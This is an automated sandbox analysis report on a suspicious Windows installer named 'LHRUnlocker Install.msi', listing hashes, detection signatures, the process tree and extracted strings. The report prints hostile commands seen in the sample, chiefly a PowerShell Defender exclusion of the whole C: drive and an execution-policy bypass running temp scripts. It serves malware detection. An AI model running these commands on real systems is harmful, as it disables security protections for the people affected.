Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
LHRUnlocker Install.msi

Overview

General Information

Sample Name:LHRUnlocker Install.msi
Analysis ID:577501
MD5:ca17c1bbedc959ad89f1c1dbf6b7aa32
SHA1:d24658face1f6fd3b457d7250c9b1a630798678d
SHA256:8fb46d2d56dd411ad10862204849abf9a4546f1ab1d40bcb6b0cac284debc055
Infos:

Detection

Score:45
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Sigma detected: Suspicious Script Execution From Temp Folder
Bypasses PowerShell execution policy
Sigma detected: Change PowerShell Policies to a Unsecure Level
Sigma detected: Powershell Defender Exclusion
Adds a directory exclusion to Windows Defender
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Deletes files inside the Windows folder
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Found dropped PE file which has not been started or loaded
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Drops PE files
Tries to load missing DLLs
Drops PE files to the windows directory (C:\Windows)
Checks for available system drives (often done to infect USB drives)
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • msiexec.exe (PID: 4348 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\LHRUnlocker Install.msi" MD5: 4767B71A318E201188A0D0A420C8B608)
  • msiexec.exe (PID: 3744 cmdline: C:\Windows\system32\msiexec.exe /V MD5: 4767B71A318E201188A0D0A420C8B608)
    • msiexec.exe (PID: 4884 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding D930A47D56309F190C9E79168CF159A8 C MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
    • msiexec.exe (PID: 6736 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding EE2A3AF825C1BBEBB4FC2081145CDAF4 MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
      • powershell.exe (PID: 7036 cmdline: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss341F.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msi3350.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scr3351.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scr3352.txt" -propSep " :<->: " -testPrefix "_testValue." MD5: DBA3E6449E97D4E3DF64527EF7012A10)
        • conhost.exe (PID: 1504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • powershell.exe (PID: 6712 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\ MD5: DBA3E6449E97D4E3DF64527EF7012A10)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
Process Memory Space: powershell.exe PID: 7036PowerShell_Susp_Parameter_ComboDetects PowerShell invocation with suspicious parametersFlorian Roth
  • 0xbd9b:$sa2: -encodedCommand
  • 0xbdc7:$sa2: -encodedCommand
  • 0xc4ac:$sa2: -EncodedCommand
  • 0xcfb6:$sa2: -EncodedCommand
  • 0xd051:$sa2: -encodedCommand
  • 0x11e5:$sc2: -NoProfile
  • 0x48a3:$sc2: -NoProfile
  • 0x684d:$sc2: -NoProfile
  • 0x286cc:$sc2: -NoProfile
  • 0x316ce:$sc2: -NoProfile
  • 0x3181e:$sc2: -NoProfile
  • 0x31c90:$sc2: -NoProfile
  • 0x32004:$sc2: -NoProfile
  • 0x32289:$sc2: -NoProfile
  • 0x32607:$sc2: -NoProfile
  • 0x3c815:$sc2: -NoProfile
  • 0x7b6f6:$sc2: -NoProfile
  • 0x7b846:$sc2: -NoProfile
  • 0x7c19f:$sc2: -NoProfile
  • 0x7c503:$sc2: -NoProfile
  • 0x7cbcd:$sc2: -NoProfile

System Summary

barindex
Source: Process startedAuthor: Florian Roth, Max Altgelt: Data: Command: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss341F.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msi3350.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scr3351.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scr3352.txt" -propSep " :<->: " -testPrefix "_testValue.", CommandLine: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss341F.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msi3350.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scr3351.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scr3352.txt" -propSep " :<->: " -testPrefix "_testValue.", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\syswow64\MsiExec.exe -Embedding EE2A3AF825C1BBEBB4FC2081145CDAF4, ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 6736, ProcessCommandLine: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss341F.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msi3350.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scr3351.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scr3352.txt" -propSep " :<->: " -testPrefix "_testValue.", ProcessId: 7036
Source: Process startedAuthor: frack113: Data: Command: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss341F.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msi3350.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scr3351.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scr3352.txt" -propSep " :<->: " -testPrefix "_testValue.", CommandLine: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss341F.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msi3350.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scr3351.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scr3352.txt" -propSep " :<->: " -testPrefix "_testValue.", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\syswow64\MsiExec.exe -Embedding EE2A3AF825C1BBEBB4FC2081145CDAF4, ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 6736, ProcessCommandLine: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss341F.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msi3350.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scr3351.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scr3352.txt" -propSep " :<->: " -testPrefix "_testValue.", ProcessId: 7036
Source: Process startedAuthor: Florian Roth: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\, CommandLine|base64offset|contains: *&, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss341F.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msi3350.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scr3351.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scr3352.txt" -propSep " :<->: " -testPrefix "_testValue.", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7036, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\, ProcessId: 6712
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss341F.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msi3350.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scr3351.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scr3352.txt" -propSep " :<->: " -testPrefix "_testValue.", CommandLine: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss341F.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msi3350.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scr3351.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scr3352.txt" -propSep " :<->: " -testPrefix "_testValue.", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\syswow64\MsiExec.exe -Embedding EE2A3AF825C1BBEBB4FC2081145CDAF4, ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 6736, ProcessCommandLine: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss341F.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msi3350.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scr3351.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scr3352.txt" -propSep " :<->: " -testPrefix "_testValue.", ProcessId: 7036
Source: Pipe createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: PipeName: \PSHost.132901445801825560.7036.DefaultAppDomain.powershell

Click to jump to signature section

Show All Signature Results
Source: Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb: source: LHRUnlocker Install.msi, 3c1a5a.msi.1.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\ShortcutFlags.pdb> source: LHRUnlocker Install.msi, 3c1a5a.msi.1.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\PowerShellScriptLauncher.pdb\ source: LHRUnlocker Install.msi, 3c1a5a.msi.1.dr, MSI3268.tmp.1.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\SoftwareDetector.pdb source: LHRUnlocker Install.msi, 3c1a5a.msi.1.dr, MSIF69B.tmp.0.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\FileOperations.pdb source: LHRUnlocker Install.msi, 3c1a5a.msi.1.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\ShortcutFlags.pdb source: LHRUnlocker Install.msi, 3c1a5a.msi.1.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\FileOperations.pdbj source: LHRUnlocker Install.msi, 3c1a5a.msi.1.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\PowerShellScriptLauncher.pdb source: LHRUnlocker Install.msi, 3c1a5a.msi.1.dr, MSI3268.tmp.1.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\SoftwareDetector.pdb` source: LHRUnlocker Install.msi, 3c1a5a.msi.1.dr, MSIF69B.tmp.0.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdb source: LHRUnlocker Install.msi, MSI2874.tmp.1.dr, 3c1a5a.msi.1.dr, MSIF447.tmp.0.dr, MSIF513.tmp.0.dr, MSIF280.tmp.0.dr, MSIEF62.tmp.0.dr, MSI1FD8.tmp.1.dr, MSIF34C.tmp.0.dr, MSIF832.tmp.0.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdbn source: LHRUnlocker Install.msi, MSI2874.tmp.1.dr, 3c1a5a.msi.1.dr, MSIF447.tmp.0.dr, MSIF513.tmp.0.dr, MSIF280.tmp.0.dr, MSIEF62.tmp.0.dr, MSI1FD8.tmp.1.dr, MSIF34C.tmp.0.dr, MSIF832.tmp.0.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb source: LHRUnlocker Install.msi, 3c1a5a.msi.1.dr
Source: C:\Windows\System32\msiexec.exeFile opened: z:
Source: C:\Windows\System32\msiexec.exeFile opened: x:
Source: C:\Windows\System32\msiexec.exeFile opened: v:
Source: C:\Windows\System32\msiexec.exeFile opened: t:
Source: C:\Windows\System32\msiexec.exeFile opened: r:
Source: C:\Windows\System32\msiexec.exeFile opened: p:
Source: C:\Windows\System32\msiexec.exeFile opened: n:
Source: C:\Windows\System32\msiexec.exeFile opened: l:
Source: C:\Windows\System32\msiexec.exeFile opened: j:
Source: C:\Windows\System32\msiexec.exeFile opened: h:
Source: C:\Windows\System32\msiexec.exeFile opened: f:
Source: C:\Windows\System32\msiexec.exeFile opened: b:
Source: C:\Windows\System32\msiexec.exeFile opened: y:
Source: C:\Windows\System32\msiexec.exeFile opened: w:
Source: C:\Windows\System32\msiexec.exeFile opened: u:
Source: C:\Windows\System32\msiexec.exeFile opened: s:
Source: C:\Windows\System32\msiexec.exeFile opened: q:
Source: C:\Windows\System32\msiexec.exeFile opened: o:
Source: C:\Windows\System32\msiexec.exeFile opened: m:
Source: C:\Windows\System32\msiexec.exeFile opened: k:
Source: C:\Windows\System32\msiexec.exeFile opened: i:
Source: C:\Windows\System32\msiexec.exeFile opened: g:
Source: C:\Windows\System32\msiexec.exeFile opened: e:
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: c:
Source: C:\Windows\System32\msiexec.exeFile opened: a:
Source: LHRUnlocker Install.msi, MSI2874.tmp.1.dr, 3c1a5a.msi.1.dr, MSIF447.tmp.0.dr, MSIF513.tmp.0.dr, MSIF280.tmp.0.dr, MSIEF62.tmp.0.dr, MSI1FD8.tmp.1.dr, MSIF34C.tmp.0.dr, MSIF69B.tmp.0.dr, MSI3268.tmp.1.dr, MSIF832.tmp.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: LHRUnlocker Install.msi, MSI2874.tmp.1.dr, 3c1a5a.msi.1.dr, MSIF447.tmp.0.dr, MSIF513.tmp.0.dr, MSIF280.tmp.0.dr, MSIEF62.tmp.0.dr, MSI1FD8.tmp.1.dr, MSIF34C.tmp.0.dr, MSIF69B.tmp.0.dr, MSI3268.tmp.1.dr, MSIF832.tmp.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: powershell.exe, 00000014.00000002.567216756.0000000003417000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: LHRUnlocker Install.msi, MSI2874.tmp.1.dr, 3c1a5a.msi.1.dr, MSIF447.tmp.0.dr, MSIF513.tmp.0.dr, MSIF280.tmp.0.dr, MSIEF62.tmp.0.dr, MSI1FD8.tmp.1.dr, MSIF34C.tmp.0.dr, MSIF69B.tmp.0.dr, MSI3268.tmp.1.dr, MSIF832.tmp.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: LHRUnlocker Install.msi, MSI2874.tmp.1.dr, 3c1a5a.msi.1.dr, MSIF447.tmp.0.dr, MSIF513.tmp.0.dr, MSIF280.tmp.0.dr, MSIEF62.tmp.0.dr, MSI1FD8.tmp.1.dr, MSIF34C.tmp.0.dr, MSIF69B.tmp.0.dr, MSI3268.tmp.1.dr, MSIF832.tmp.0.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: LHRUnlocker Install.msi, MSI2874.tmp.1.dr, 3c1a5a.msi.1.dr, MSIF447.tmp.0.dr, MSIF513.tmp.0.dr, MSIF280.tmp.0.dr, MSIEF62.tmp.0.dr, MSI1FD8.tmp.1.dr, MSIF34C.tmp.0.dr, MSIF69B.tmp.0.dr, MSI3268.tmp.1.dr, MSIF832.tmp.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: LHRUnlocker Install.msi, MSI2874.tmp.1.dr, 3c1a5a.msi.1.dr, MSIF447.tmp.0.dr, MSIF513.tmp.0.dr, MSIF280.tmp.0.dr, MSIEF62.tmp.0.dr, MSI1FD8.tmp.1.dr, MSIF34C.tmp.0.dr, MSIF69B.tmp.0.dr, MSI3268.tmp.1.dr, MSIF832.tmp.0.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: powershell.exe, 00000008.00000002.574716959.0000000005DB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: LHRUnlocker Install.msi, MSI2874.tmp.1.dr, 3c1a5a.msi.1.dr, MSIF447.tmp.0.dr, MSIF513.tmp.0.dr, MSIF280.tmp.0.dr, MSIEF62.tmp.0.dr, MSI1FD8.tmp.1.dr, MSIF34C.tmp.0.dr, MSIF69B.tmp.0.dr, MSI3268.tmp.1.dr, MSIF832.tmp.0.drString found in binary or memory: http://ocsp.digicert.com0C
Source: LHRUnlocker Install.msi, MSI2874.tmp.1.dr, 3c1a5a.msi.1.dr, MSIF447.tmp.0.dr, MSIF513.tmp.0.dr, MSIF280.tmp.0.dr, MSIEF62.tmp.0.dr, MSI1FD8.tmp.1.dr, MSIF34C.tmp.0.dr, MSIF69B.tmp.0.dr, MSI3268.tmp.1.dr, MSIF832.tmp.0.drString found in binary or memory: http://ocsp.digicert.com0O
Source: powershell.exe, 00000008.00000002.569890289.0000000004E93000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000008.00000002.569890289.0000000004E93000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png0
Source: powershell.exe, 00000014.00000002.569907486.0000000005463000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000008.00000002.569706056.0000000004D51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.569503503.0000000005321000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000014.00000002.569907486.0000000005463000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: LHRUnlocker Install.msi, MSI2874.tmp.1.dr, 3c1a5a.msi.1.dr, MSIF447.tmp.0.dr, MSIF513.tmp.0.dr, MSIF280.tmp.0.dr, MSIEF62.tmp.0.dr, MSI1FD8.tmp.1.dr, MSIF34C.tmp.0.dr, MSIF69B.tmp.0.dr, MSI3268.tmp.1.dr, MSIF832.tmp.0.drString found in binary or memory: http://t1.symcb.com/ThawtePCA.crl0
Source: LHRUnlocker Install.msi, MSI2874.tmp.1.dr, 3c1a5a.msi.1.dr, MSIF447.tmp.0.dr, MSIF513.tmp.0.dr, MSIF280.tmp.0.dr, MSIEF62.tmp.0.dr, MSI1FD8.tmp.1.dr, MSIF34C.tmp.0.dr, MSIF69B.tmp.0.dr, MSI3268.tmp.1.dr, MSIF832.tmp.0.drString found in binary or memory: http://t2.symcb.com0
Source: LHRUnlocker Install.msi, MSI2874.tmp.1.dr, 3c1a5a.msi.1.dr, MSIF447.tmp.0.dr, MSIF513.tmp.0.dr, MSIF280.tmp.0.dr, MSIEF62.tmp.0.dr, MSI1FD8.tmp.1.dr, MSIF34C.tmp.0.dr, MSIF69B.tmp.0.dr, MSI3268.tmp.1.dr, MSIF832.tmp.0.drString found in binary or memory: http://tl.symcb.com/tl.crl0
Source: LHRUnlocker Install.msi, MSI2874.tmp.1.dr, 3c1a5a.msi.1.dr, MSIF447.tmp.0.dr, MSIF513.tmp.0.dr, MSIF280.tmp.0.dr, MSIEF62.tmp.0.dr, MSI1FD8.tmp.1.dr, MSIF34C.tmp.0.dr, MSIF69B.tmp.0.dr, MSI3268.tmp.1.dr, MSIF832.tmp.0.drString found in binary or memory: http://tl.symcb.com/tl.crt0
Source: LHRUnlocker Install.msi, MSI2874.tmp.1.dr, 3c1a5a.msi.1.dr, MSIF447.tmp.0.dr, MSIF513.tmp.0.dr, MSIF280.tmp.0.dr, MSIEF62.tmp.0.dr, MSI1FD8.tmp.1.dr, MSIF34C.tmp.0.dr, MSIF69B.tmp.0.dr, MSI3268.tmp.1.dr, MSIF832.tmp.0.drString found in binary or memory: http://tl.symcd.com0&
Source: powershell.exe, 00000008.00000002.569890289.0000000004E93000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000008.00000002.569890289.0000000004E93000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html0
Source: LHRUnlocker Install.msi, MSI2874.tmp.1.dr, 3c1a5a.msi.1.dr, MSIF447.tmp.0.dr, MSIF513.tmp.0.dr, MSIF280.tmp.0.dr, MSIEF62.tmp.0.dr, MSI1FD8.tmp.1.dr, MSIF34C.tmp.0.dr, MSIF69B.tmp.0.dr, MSI3268.tmp.1.dr, MSIF832.tmp.0.drString found in binary or memory: http://www.digicert.com/CPS0
Source: LHRUnlocker Install.msi, 3c1a5a.msi.1.drString found in binary or memory: http://www.winimage.com/zLibDll
Source: LHRUnlocker Install.msi, 3c1a5a.msi.1.drString found in binary or memory: http://www.winimage.com/zLibDll1.2.7rbr
Source: powershell.exe, 00000008.00000002.574716959.0000000005DB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000008.00000002.574716959.0000000005DB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000008.00000002.574716959.0000000005DB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: LHRUnlocker Install.msi, 3c1a5a.msi.1.drString found in binary or memory: https://drivers.sergeydev.com/windows/511.65-desktop-win64bit-interr
Source: powershell.exe, 00000008.00000002.569890289.0000000004E93000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000008.00000002.569890289.0000000004E93000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester0
Source: powershell.exe, 00000008.00000003.527476361.00000000057BD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
Source: powershell.exe, 00000008.00000002.574716959.0000000005DB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: 3c1a5a.msi.1.drString found in binary or memory: https://t.me/LHRUnlockerChannelButtonText_Finish&FinishManufacturerSergeyProductCode
Source: 3c1a5a.msi.1.drString found in binary or memory: https://t.me/LHRUnlockerMSIFASTINSTALLAI_CURRENT_YEAR2022ButtonText_Decline&DeclineAI_PREDEF_LCONDS_
Source: LHRUnlocker Install.msi, MSI2874.tmp.1.dr, 3c1a5a.msi.1.dr, MSIF447.tmp.0.dr, MSIF513.tmp.0.dr, MSIF280.tmp.0.dr, MSIEF62.tmp.0.dr, MSI1FD8.tmp.1.dr, MSIF34C.tmp.0.dr, MSIF69B.tmp.0.dr, MSI3268.tmp.1.dr, MSIF832.tmp.0.drString found in binary or memory: https://www.advancedinstaller.com
Source: LHRUnlocker Install.msi, MSI2874.tmp.1.dr, 3c1a5a.msi.1.dr, MSIF447.tmp.0.dr, MSIF513.tmp.0.dr, MSIF280.tmp.0.dr, MSIEF62.tmp.0.dr, MSI1FD8.tmp.1.dr, MSIF34C.tmp.0.dr, MSIF69B.tmp.0.dr, MSI3268.tmp.1.dr, MSIF832.tmp.0.drString found in binary or memory: https://www.digicert.com/CPS0
Source: LHRUnlocker Install.msi, MSI2874.tmp.1.dr, 3c1a5a.msi.1.dr, MSIF447.tmp.0.dr, MSIF513.tmp.0.dr, MSIF280.tmp.0.dr, MSIEF62.tmp.0.dr, MSI1FD8.tmp.1.dr, MSIF34C.tmp.0.dr, MSIF69B.tmp.0.dr, MSI3268.tmp.1.dr, MSIF832.tmp.0.drString found in binary or memory: https://www.thawte.com/cps0/
Source: LHRUnlocker Install.msi, MSI2874.tmp.1.dr, 3c1a5a.msi.1.dr, MSIF447.tmp.0.dr, MSIF513.tmp.0.dr, MSIF280.tmp.0.dr, MSIEF62.tmp.0.dr, MSI1FD8.tmp.1.dr, MSIF34C.tmp.0.dr, MSIF69B.tmp.0.dr, MSI3268.tmp.1.dr, MSIF832.tmp.0.drString found in binary or memory: https://www.thawte.com/repository0W
Source: Process Memory Space: powershell.exe PID: 7036, type: MEMORYSTRMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file, modified = 2021-09-28
Source: C:\Windows\System32\msiexec.exeFile deleted: C:\Windows\Installer\MSI1FD8.tmpJump to behavior
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\3c1a5a.msiJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00874080
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_008755B8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00873168
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00870B90
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_008793B8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00874BC8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0087CB70
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00871428
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0087B6B0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0087B6A0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0087B6B0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00887538
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_035DB9B0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess Stats: CPU usage > 98%
Source: LHRUnlocker Install.msiBinary or memory string: OriginalFilenameviewer.exeF vs LHRUnlocker Install.msi
Source: LHRUnlocker Install.msiBinary or memory string: OriginalFilenameSoftwareDetector.dllF vs LHRUnlocker Install.msi
Source: LHRUnlocker Install.msiBinary or memory string: OriginalFilenameShortcutFlags.dllF vs LHRUnlocker Install.msi
Source: LHRUnlocker Install.msiBinary or memory string: OriginalFilenameAICustAct.dllF vs LHRUnlocker Install.msi
Source: LHRUnlocker Install.msiBinary or memory string: OriginalFilenamePowerShellScriptLauncher.dllF vs LHRUnlocker Install.msi
Source: LHRUnlocker Install.msiBinary or memory string: OriginalFilenameFileOperations.dllF vs LHRUnlocker Install.msi
Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dll
Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dll
Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dll
Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dll
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dll
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: unknownProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\LHRUnlocker Install.msi"
Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding D930A47D56309F190C9E79168CF159A8 C
Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding EE2A3AF825C1BBEBB4FC2081145CDAF4
Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss341F.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msi3350.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scr3351.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scr3352.txt" -propSep " :<->: " -testPrefix "_testValue."
